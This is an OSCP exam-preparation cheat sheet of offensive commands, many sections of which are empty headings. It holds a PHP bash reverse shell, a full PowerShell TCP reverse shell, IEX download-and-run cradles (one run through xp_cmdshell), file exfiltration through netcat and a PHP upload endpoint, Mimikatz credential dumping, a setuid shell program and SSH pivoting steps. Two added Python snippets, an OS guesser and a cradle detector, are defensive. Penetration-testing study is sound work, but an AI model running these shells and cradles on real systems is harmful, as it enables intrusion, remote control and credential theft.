Home

Awesome

JustTryHarder

JustTryHarder, a cheat sheet which will aid you through the PWK course & the OSCP Exam.

(Inspired by PayloadAllTheThings)

Feel free to submit a Pull Request & leave a star to share some love if this helped you. 💖

Hacktoberfest friendly! Yes, we are open to Pull Requests for Hacktoberfest! Please ensure it's not spam and actually contributes well to this repo. Thanks & happy hacking!

Disclaimer: None of the below includes spoilers for the PWK labs / OSCP Exam.

Credit Info: I have obtained a lot of this info through other GitHub repos, blogs, sites and more. I have tried to give as much credit to the original creator as possible; if I have not given you credit, please contact me on Twitter: https://twitter.com/s1nfulz

Determining the OS of a host via Ping


ping 10.10.10.110
PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data.
64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms

The TTL can be used to determine the OS of the host. The three different types of TTL are as shown below:
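As an added example (not code from the original cheat sheet), a small Python parser that pulls the TTL out of ping output, picks the nearest common default TTL above it and reports how many hops away the host is. The default values 64/128/255 and the OS families attached to them are an assumption based on common vendor defaults, and the sample transcript is constructed to match the reply shown above.

```python
import re
from typing import List, Optional, Tuple

# Assumed common initial TTL values (not from the original page): 64 for
# Linux/Unix-like hosts, 128 for Windows, 255 for network devices and some
# Unix variants. Treat the result as a hint, not a positive identification.
INITIAL_TTLS = {64: "Linux/Unix-like", 128: "Windows", 255: "Network device / other Unix"}

# Matches "ttl=128" (Linux ping) and "TTL=128" (Windows ping).
TTL_RE = re.compile(r"\bttl=(\d+)\b", re.IGNORECASE)


def parse_ttl(reply_line: str) -> Optional[int]:
    """Extract the TTL value from one ping reply line; None if the line has none."""
    m = TTL_RE.search(reply_line)
    return int(m.group(1)) if m else None


def guess_os(ttl: int) -> Tuple[str, int]:
    """Return (os_family_hint, estimated_hops) for an observed TTL.

    The initial TTL is taken to be the smallest common default that is >= the
    observed value; the difference is the number of routers the reply crossed.
    """
    for initial in sorted(INITIAL_TTLS):
        if ttl <= initial:
            return INITIAL_TTLS[initial], initial - ttl
    return "unknown", 0


def classify_ping_output(output: str) -> List[Tuple[int, str, int]]:
    """Classify every reply line in a ping transcript as (ttl, hint, hops)."""
    results = []
    for line in output.splitlines():
        ttl = parse_ttl(line)
        if ttl is not None:
            hint, hops = guess_os(ttl)
            results.append((ttl, hint, hops))
    return results


# Constructed sample transcript, modelled on the reply shown above (ttl=128).
SAMPLE = """PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data.
64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms
64 bytes from 10.10.10.110: icmp_seq=2 ttl=128 time=160 ms
"""

if __name__ == "__main__":
    for ttl, hint, hops in classify_ping_output(SAMPLE):
        print(f"ttl={ttl}: likely {hint}, about {hops} hop(s) away")
```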

BOF (WIP)


(Typical bad characters include: 0x00, 0x0A, 0x0D)

Good BOF resources:

Breakouts / Environment Escapes


DNS - Zone Transfers


File Transfers


SMB Transfer

On the Victim machine (Windows)

net use x: \\10.10.10.10\myshare
copy whatever.zip x:\

Wget Transfer

How to retrieve file(s) from host (inside a reverse shell)

# Place the file you want transferred in /var/www/html/
service apache2 start
# Run on the remote server
wget http://10.10.10.10/pspy64        # <- for a single file
wget -r http://10.10.10.10/pspy64/    # <- for a folder

TFTP Transfer

(How to transfer from Kali to Windows)

Using MSF.

Start MSF before these steps:

Inside MSF

  1. use auxiliary/server/tftp
  2. set TFTPROOT /usr/share/mimikatz/Win32/
  3. run

Inside a terminal

  1. tftp -i 10.10.10.10 GET mimikatz.exe

NetCat (Windows to Kali)

  1. Windows: nc -nv 10.11.0.61 4444 < bank-account.zip

  2. Linux: nc -nlvp 4444 > bank-account.zip

PowerShell

Invoke-WebRequest -Uri http://127.0.0.1/exploit.py -OutFile C:\Users\Victim\exploit.py

Without an interactive powershell session:

# Create wget.ps1
$url = "http://10.10.10.10/file.txt"   # URL of the file to fetch
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)

Base64 (Linux -> Linux)

Local Host:

  1. base64 /path/to/exploit.py > encoded.b64
  2. Transfer encoded.b64 to the remote server via nc or otherwise.

Remote Server - Linux:

  1. cat /path/to/encoded.b64 | base64 -d > exploit.py

Remote Server - PowerShell

Certutil

certutil.exe -urlcache -split -f "http://ip.for.kali.box/file-to-get.zip" name-to-save-as.zip

HTTP File Upload (Exfiltration)

Upload:

  1. Create upload.php file in attacking machine webroot, /var/www/html by default.

<?php
$uploaddir = '/var/www/uploads/';

$uploadfile = $uploaddir . $_FILES['file']['name'];

move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>

  2. Create upload directory and set appropriate permissions to allow upload.

sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads

  3. Upload file from victim machine to attacking machine using PowerShell:

powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('http://10.10.10.10/upload.php', 'file-to-upload.txt')"

Kerberoasting

LFI / RFI

PHP Reverse Shell:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10/1234 0>&1'"); ?>

Command Injection:

<?php echo shell_exec('whoami'); ?>

MSSQL / SQLi

Password Cracking

Hashcat

John The Ripper

Password Spraying (CrackMapExec)

Payload Generation

PHP

Priv Esc - Linux

If GCC & wget are installed, the system MIGHT be vulnerable to a kernel exploit

#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <unistd.h>     /* setuid(), geteuid() */
#include <sys/types.h>

int main(){
    /* Make the real UID match the effective UID so the spawned shell keeps it */
    setuid(geteuid());
    system("/bin/bash");
    return 0;
}

Priv Esc - Windows

Post Exploitation

  1. Mimikatz.exe (run it)
  2. privilege::debug
  3. sekurlsa::logonpasswords

Port Forwarding

• Local -- Forward local port to remote host.
• Remote -- Forward remote port to local host.
• Dynamic -- Use SOCKS.

Use local if you have a service running on a machine that can be reached from the remote machine, and you want to access it directly from the local machine. After setting up the tunnelling you will be able to access the service using your local host IP (127.0.0.1).

Use remote if you have a service that can be reached from the local machine, and you need to make it available to the remote machine. It opens the listening socket on the machine you have used SSH to log into.

Dynamic is like local, but on the client side it behaves like a SOCKS proxy. Use it if you need to connect with software that expects SOCKS forwarding.

Chisel local system:

./chisel server -p 8080 --reverse

victim:

./chisel client YOUR_IP:8080 R:1234:127.0.0.1:1234

Plink

SSH

  1. Generate an SSH key pair on the box being pivoted through to protect your credentials.

ssh-keygen
cat ~/.ssh/id_rsa.pub

  2. Copy the public key output from the above command. Add this value and the pivot machine's IP address to the ~/.ssh/authorized_keys file on your attacking (Kali) machine using the syntax below. If you do not already have this file, simply create a new file and add the contents below.

from="[VICTIM_MACHINE_IP_ADDRESS]",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty [PUBLIC_KEY_VALUE]

  3. Ensure the SSH service is running on your attacking (Kali) machine.

sudo service ssh start

  4. Initiate the SSH connection from the box being pivoted through and specify the id_rsa private key generated in step 1. This private key may be called something else if you changed the name when generating it. Ensure the username and IP address of your attacking machine are correct.

ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /[PATH_TO_YOUR_PRIVATE_KEY]/id_rsa kali@[ATTACKING_MACHINE_IP]

  5. Edit your /etc/proxychains.conf file to add the line below.

socks4 127.0.0.1 1080

  6. Prepend the proxychains command to pivot through the compromised host. When scanning with nmap, be sure to use TCP Connect scans, e.g.

sudo proxychains nmap -sT -p80 -sC -sV --open -Pn -n 10.10.10.10

Additional Notes:

Socks Proxy (using PowerShell)

Local

Port Scanning

TCP

UDP (can take hours so maybe netstat is a better alternative)

SNMP nmap -p161 -sU -iL ips.txt > udp.txt (cmd could be wrong, double check)

SSH nmap --script ssh2-enum-algos -iL ips.txt > SSH.txt

SSL nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt

NMAP Bootstrap Report

nmap -oA poison --stylesheet nmap-bootstrap.xsl 10.10.10.10
firefox nmap-bootstrap.xsl

Ping Sweep

Linux (basic one liners)

Linux (script)

for i in `seq 1 255`
do
    ping -c1 192.168.125.$i 2>/dev/null 1>&2
    if [[ $? -eq 0 ]]
    then
        echo 192.168.125.$i is up
    fi
done

Windows (cmd)

Windows (PowerShell)

Nmap

Pivoting

Remote Desktop

Responder

Reverse Shells

Linux

Windows

Shell Upgrading

Source: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ & https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell

SQL Injection (SQLmap)

Python

Spawn a PTY with either interpreter:

  1. python -c 'import pty; pty.spawn("/bin/bash")' or
  2. python3 -c 'import pty; pty.spawn("/bin/bash")'

Full upgrade sequence:

- In reverse shell

1. python -c 'import pty; pty.spawn("/bin/bash")'
2. Ctrl-Z

- In Kali

3. stty raw -echo
4. fg

- In reverse shell

5. reset (sometimes optional)
6. export SHELL=bash
7. export TERM=xterm-256color
8. stty rows <num> columns <cols> (optional)
(Sometimes the command will need to be executed: export TERM=xterm)

Using socat

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Perl

  1. perl -e 'exec "/bin/sh";'
  2. perl: exec "/bin/sh";

Bash

/bin/sh -i

Show listening ports

SMB - Enumeration

SMB - Impacket

Password: (password)

[*] Trying protocol 445/SMB...

  1. cd /usr/share/windows-binaries
  2. python /usr/share/doc/python-impacket/examples/smbserver.py a .
  3. \\10.10.10.10\a\mimikatz.exe

SMTP Enumeration

https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt

ICMP Injection

  1. ping -n 3 10.10.10.10
  2. tcpdump -i tun0 icmp

VMware (not going full screen)

systemctl restart open-vm-tools.service

Web Servers:

Web Scanning:

Web Scanning with extensions

Linux (Example web server might be Apache)

gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401

Windows (Example web server might be IIS)

gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401

Linux (Example web server might be Apache)

python3 dirsearch.py -r -u http://10.10.10.131/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50

Windows (Example web server might be IIS)

python3 dirsearch.py -r -u http://10.10.10.131/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,asp,aspx,jsp,bak -t 50

HTTP

gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69

HTTPS (in some cases --wildcard will need to be used instead of -k)

gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69

Nikto

nikto -h 10.10.10.10 -p 80

Nikto HTTPS

nikto -h 10.10.10.10 -p 443

WFuzz

wfuzz -u http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00 -w /usr/share/wfuzz/wordlist/general/common.txt

Web Shells

WordPress

Windows Framework / Powershell

bypass PowerShell execution policy


powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1') | powershell -noprofile -
IEX(New-object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1')

powershell -nop -exec bypass IEX "(New-Object Net.WebClient).DownloadString('http://10.10.14.x/Whatever.ps1'); Invoke-Whatever"
xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.10.10/Nishang-ReverseShell.ps1\")
powershell -c IEX(New-Object Net.WebClient).DownloadFile('http://server/path/to/file', 'nameforefile')
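A defender's counterpart to the one-liners above, added here and not part of the original cheat sheet: a Python scorer that flags process command lines carrying the cradle indicators those commands share (IEX, DownloadString/DownloadFile, Net.WebClient, Sockets.TCPClient, -exec bypass, -nop, xp_cmdshell). The indicator weights, the alert threshold and the sample log lines are constructed assumptions for this example.

```python
import re
from typing import Dict, List, Tuple

# Indicators taken from the cradle one-liners above; the weights are an
# assumption for this example, not a published scoring scheme.
INDICATORS: Dict[str, Tuple[re.Pattern, int]] = {
    "invoke_expression": (re.compile(r"\b(iex|invoke-expression)\b", re.I), 2),
    "web_download": (re.compile(r"\.(downloadstring|downloadfile)\s*\(", re.I), 2),
    "webclient": (re.compile(r"net\.webclient", re.I), 1),
    "tcp_client": (re.compile(r"net\.sockets\.tcpclient", re.I), 3),
    "exec_bypass": (re.compile(r"-(exec|executionpolicy|ep)\s+(bypass|unrestricted)", re.I), 2),
    "no_profile": (re.compile(r"-no(p|profile)\b", re.I), 1),
    "xp_cmdshell": (re.compile(r"\bxp_cmdshell\b", re.I), 3),
}
ALERT_THRESHOLD = 3  # assumption: tune to the noise level of your environment


def score_command_line(cmd: str) -> Dict[str, object]:
    """Return the matched indicator names, a total score and an alert flag."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(cmd)]
    score = sum(INDICATORS[name][1] for name in hits)
    return {"hits": hits, "score": score, "alert": score >= ALERT_THRESHOLD}


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Score each process command line and keep only those that alert."""
    alerts = []
    for line in lines:
        result = score_command_line(line)
        if result["alert"]:
            result["line"] = line
            alerts.append(result)
    return alerts


# Constructed sample command lines (not real telemetry), in the style of
# process-creation events; the last one is truncated on purpose.
SAMPLE_LOG = [
    "powershell.exe -nop -exec bypass IEX \"(New-Object Net.WebClient).DownloadString('http://10.10.14.x/Whatever.ps1'); Invoke-Whatever\"",
    "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users\\victim\\Documents",
    "sqlservr.exe xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.10.10/Nishang-ReverseShell.ps1\")",
    "powershell.exe -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();...\"",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"score={alert['score']} hits={alert['hits']}: {alert['line'][:60]}")
```

The benign -NoProfile line scores below the threshold, which is the point of weighting: a single common switch is not an alert on its own.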

Windows Post Exploitation Commands

Writeable Directories

Windows


List from https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md. The following folders are by default writable by normal users (depends on Windows version; this is from W10 1803):

C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after performing a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

Linux

To find World Writeable Directories in Linux use the command: find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print

Todo List:

Thank you:

Thanks to these people for including my cheatsheet on their website/blog: